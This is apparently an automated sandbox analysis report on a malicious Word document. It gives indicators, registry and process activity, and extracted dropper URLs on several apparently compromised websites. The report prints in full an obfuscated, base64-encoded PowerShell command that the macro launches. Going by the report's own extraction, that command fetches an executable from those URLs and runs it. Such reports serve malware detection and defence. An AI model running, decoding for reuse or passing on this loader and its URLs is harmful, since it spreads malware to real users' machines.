a99c9ad593ce0d637ad4526f58ca7493d46ff5142d908d55ef9ee711deefb69b

Analysis

max time kernel
117s
max time network
127s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
09/05/2024, 13:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a2442881b7130fdbb2fa25fa2cdc0fb_JaffaCakes118.doc
Size

191KB
MD5

2a2442881b7130fdbb2fa25fa2cdc0fb
SHA1

e1c3e7dda75f30d0f1116be4b8f34a465855b3c2
SHA256

a99c9ad593ce0d637ad4526f58ca7493d46ff5142d908d55ef9ee711deefb69b
SHA512

ea038c49f0d5a71a601a41203d5424b3a642c7f3c95aaf0670d950f67465174770db55cca39f4ee89657a00108a86d9bbf8127ce950546ce5272f2be04056bf3
SSDEEP

3072:i9ufstRUUKSns8T00JSHUgteMJ8qMD7gjj0zKNf9cfmfE7qdmVJKk/Juvc5a8a8L:i9ufsfgIf0pL8KbS

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://reklamdasiniz.com/wp-admin/W/

exe.dropper

http://www.paramedicaleducationguidelines.com/wp-admin/7S/

exe.dropper

http://bimasoftcbt.maannajahjakarta.com/wp-admin/i3K/

exe.dropper

http://casualhome.com/wp-admin/Y/

exe.dropper

https://aemine.vn/wp-admin/KMq/

exe.dropper

http://aahnaturals.net/wp-includes/A3/

exe.dropper

https://sbsec.org/bsadmin-portal/1nf/

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
8	2440	POwersheLL.exe
9	2440	POwersheLL.exe
10	2440	POwersheLL.exe
12	2440	POwersheLL.exe
14	2440	POwersheLL.exe
16	2440	POwersheLL.exe
19	2440	POwersheLL.exe
22	2440	POwersheLL.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POwersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\TypeLib	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1736	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2440	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2440	POwersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1736	WINWORD.EXE
1736	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 788	1736	WINWORD.EXE	33
PID 1736 wrote to memory of 788	1736	WINWORD.EXE	33
PID 1736 wrote to memory of 788	1736	WINWORD.EXE	33
PID 1736 wrote to memory of 788	1736	WINWORD.EXE	33

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2a2442881b7130fdbb2fa25fa2cdc0fb_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:788

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABWAHQAbQBmADQAegB5AD0AKAAoACcATABsACcAKwAnADcAJwApACsAKAAnAGwAJwArACcAMQBpACcAKQArACcAeQAnACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AVgA6AHUAcwBFAHIAUABSAE8ARgBpAEwARQBcAEsAdgBvADkAOQAwAFcAXAB5AGgAVwAwAFMAOABlAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AG8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AGAAUgBJAGAAVAB5AFAAYABSAG8AVABvAGAAYwBvAEwAIgAgAD0AIAAoACcAdABsACcAKwAoACcAcwAxACcAKwAnADIALAAgACcAKQArACcAdAAnACsAKAAnAGwAcwAxACcAKwAnADEALAAnACsAJwAgAHQAbABzACcAKQApADsAJABBADAAOABwAHMAcABfACAAPQAgACgAKAAnAE4AJwArACcANABrACcAKQArACgAJwBxACcAKwAnAHUAcAAnACkAKQA7ACQAVwB3AGUAcwBnAHUAcwA9ACgAJwBEACcAKwAoACcANgByACcAKwAnAHYAJwApACsAKAAnADAAJwArACcAYwA1ACcAKQApADsAJABWAGgAYwBxAG8AZwBxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAE8AJwArACgAJwBxAEkAJwArACcASwB2AG8AOQAnACkAKwAoACcAOQAwAHcATwBxAEkAJwArACcAWQBoACcAKQArACcAdwAnACsAJwAwACcAKwAnAHMAJwArACgAJwA4ACcAKwAnAGUATwBxAEkAJwApACkAIAAgAC0AUgBlAFAAbABhAEMARQAoACcATwAnACsAJwBxAEkAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKwAkAEEAMAA4AHAAcwBwAF8AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAOAA1AHMAeABkAGsAPQAoACcAUwAnACsAKAAnAHUAdAAnACsAJwBwAHoAeAB6ACcAKQApADsAJABKAGgANQBnAG4ANwBmAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABpAEUAbgBUADsAJABUADgAeQA4AGsAeAB5AD0AKAAoACcAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwByAGUAawAnACsAJwBsAGEAbQAnACsAJwBkACcAKQArACgAJwBhAHMAJwArACcAaQBuAGkAegAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACgAJwBpACcAKwAnAG4ALwBXAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwB3AC4AcAAnACsAJwBhACcAKQArACgAJwByAGEAbQBlAGQAJwArACcAaQBjAGEAbAAnACkAKwAnAGUAJwArACgAJwBkAHUAYwAnACsAJwBhACcAKQArACgAJwB0ACcAKwAnAGkAbwBuAGcAdQAnACsAJwBpAGQAZQBsAGkAbgAnACkAKwAoACcAZQAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtAC8AdwBwACcAKwAnAC0AYQBkACcAKwAnAG0AJwApACsAKAAnAGkAbgAnACsAJwAvADcAUwAvACoAJwArACcAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvAC8AJwArACcAYgBpAG0AYQAnACsAJwBzACcAKQArACcAbwAnACsAKAAnAGYAdABjAGIAJwArACcAdAAuAG0AYQAnACsAJwBhAG4AJwApACsAKAAnAG4AJwArACcAYQBqACcAKQArACgAJwBhACcAKwAnAGgAagBhACcAKwAnAGsAYQAnACkAKwAnAHIAdAAnACsAJwBhACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAbQBpACcAKwAnAG4AJwApACsAKAAnAC8AaQAnACsAJwAzAEsALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAGMAYQBzAHUAYQBsACcAKwAnAGgAbwBtAGUALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQAnACsAJwBuAC8AWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcABzADoALwAvAGEAJwArACcAZQBtACcAKQArACgAJwBpACcAKwAnAG4AZQAnACkAKwAoACcALgB2ACcAKwAnAG4AJwApACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAJwBhACcAKwAoACcAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBLAE0AcQAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6ACcAKQArACgAJwAvAC8AYQBhACcAKwAnAGgAJwApACsAKAAnAG4AYQAnACsAJwB0ACcAKQArACgAJwB1ACcAKwAnAHIAJwArACcAYQBsACcAKwAnAHMALgBuAGUAdAAvAHcAcAAnACkAKwAnAC0AaQAnACsAKAAnAG4AYwBsAHUAZAAnACsAJwBlACcAKwAnAHMALwBBADMALwAqAGgAdAB0AHAAJwArACcAcwAnACkAKwAoACcAOgAvAC8AcwAnACsAJwBiACcAKQArACcAcwAnACsAJwBlAGMAJwArACgAJwAuACcAKwAnAG8AcgAnACkAKwAoACcAZwAnACsAJwAvAGIAJwApACsAKAAnAHMAJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgAtACcAKwAnAHAAJwApACsAKAAnAG8AJwArACcAcgB0ACcAKQArACgAJwBhAGwAJwArACcALwAxACcAKQArACgAJwBuACcAKwAnAGYALwAnACkAKQAuACIAUwBgAFAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAGcAcQB1AHoAZwBzAD0AKAAoACcAWQBwADMAJwArACcAcgBpACcAKQArACcAeQAnACsAJwB6ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0AcwByAHkAYQAwAG4AIABpAG4AIAAkAFQAOAB5ADgAawB4AHkAKQB7AHQAcgB5AHsAJABKAGgANQBnAG4ANwBmAC4AIgBkAGAAbwBXAE4AbABPAGAAQQBEAGYAYABJAGwAZQAiACgAJABNAHMAcgB5AGEAMABuACwAIAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUwAwAHYAdAAyADkAMgA9ACgAJwBJADYAJwArACgAJwA0AHgAJwArACcAYQAnACkAKwAnAGMAZwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAVgBoAGMAcQBvAGcAcQApAC4AIgBsAEUATgBgAGcAYABUAGgAIgAgAC0AZwBlACAAMgA5ADgANAAyACkAIAB7AC4AKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFYAaABjAHEAbwBnAHEAKQA7ACQAUABmADQAeABrAGcAdAA9ACgAJwBVACcAKwAnAHUAJwArACgAJwBoAG0ANAAnACsAJwBhAGIAJwApACkAOwBiAHIAZQBhAGsAOwAkAE4AMQAyAGMAZgBmAHMAPQAoACgAJwBRAGkAJwArACcANQBuADcAJwApACsAJwBhACcAKwAnADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAGwAdwBzADcAbgBwAD0AKAAoACcAQQBlACcAKwAnADkAJwApACsAKAAnAG4AdQByACcAKwAnAHQAJwApACkA
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
